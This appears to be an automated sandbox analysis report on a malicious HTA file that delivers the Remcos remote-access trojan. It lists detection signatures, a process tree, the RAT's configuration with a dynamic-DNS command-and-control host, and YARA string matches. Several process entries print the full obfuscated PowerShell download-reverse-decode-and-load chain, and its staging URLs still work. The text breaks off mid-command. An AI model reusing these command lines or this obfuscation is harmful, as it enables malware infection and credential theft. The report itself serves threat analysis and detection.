Windows Analysis Report
seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta

Overview

General Information

Sample name: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
Analysis ID: 1557815
MD5: 2d71e3e87e2ea2945dcc2571b74fdb43
SHA1: a338df9a850b1c37528e1b517786285c216cf5e0
SHA256: 0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4
Tags: hta, user-pr0xylife

Detection

Cobalt Strike, Remcos, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7528 cmdline: mshta.exe "C:\Users\user\Desktop\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7628 cmdline: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD4B.tmp" "c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 8028 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 8092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • CasPol.exe (PID: 3276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • chrome.exe (PID: 7332 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • CasPol.exe (PID: 5576 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 3832 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 4136 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nupmhthbjzo" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 4520 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 6784 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 3836 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 5168 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 7360 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • msedge.exe (PID: 1660 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 7772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1972,i,17397243976134850236,17257031585275351317,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • svchost.exe (PID: 7604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7696 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2324 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6784 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3220 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6888 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
Source | Rule | Description | Author | Strings
0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown |
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings
12.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
12.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
12.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
12.2.CasPol.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
                • 0x6b6f8:$a1: Remcos restarted by watchdog!
                • 0x6bc70:$a3: %02i:%02i:%02i:%03i
12.2.CasPol.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown |
                • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x65a04:$str_b2: Executing file:
                • 0x6683c:$str_b3: GetDirectListeningPort
                • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x66380:$str_b7: \update.vbs
                • 0x65a2c:$str_b9: Downloaded file:
                • 0x65a18:$str_b10: Downloading file:
                • 0x65abc:$str_b12: Failed to upload file:
                • 0x66804:$str_b13: StartForward
                • 0x66824:$str_b14: StopForward
                • 0x662d8:$str_b15: fso.DeleteFile "
                • 0x6626c:$str_b16: On Error Resume Next
                • 0x66308:$str_b17: fso.DeleteFolder "
                • 0x65aac:$str_b18: Uploaded file:
                • 0x65a6c:$str_b19: Unable to delete:
                • 0x662a0:$str_b20: while fso.FileExists("
                • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings
amsi32_752.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_752.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process started, Author: Thomas Patzke, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = 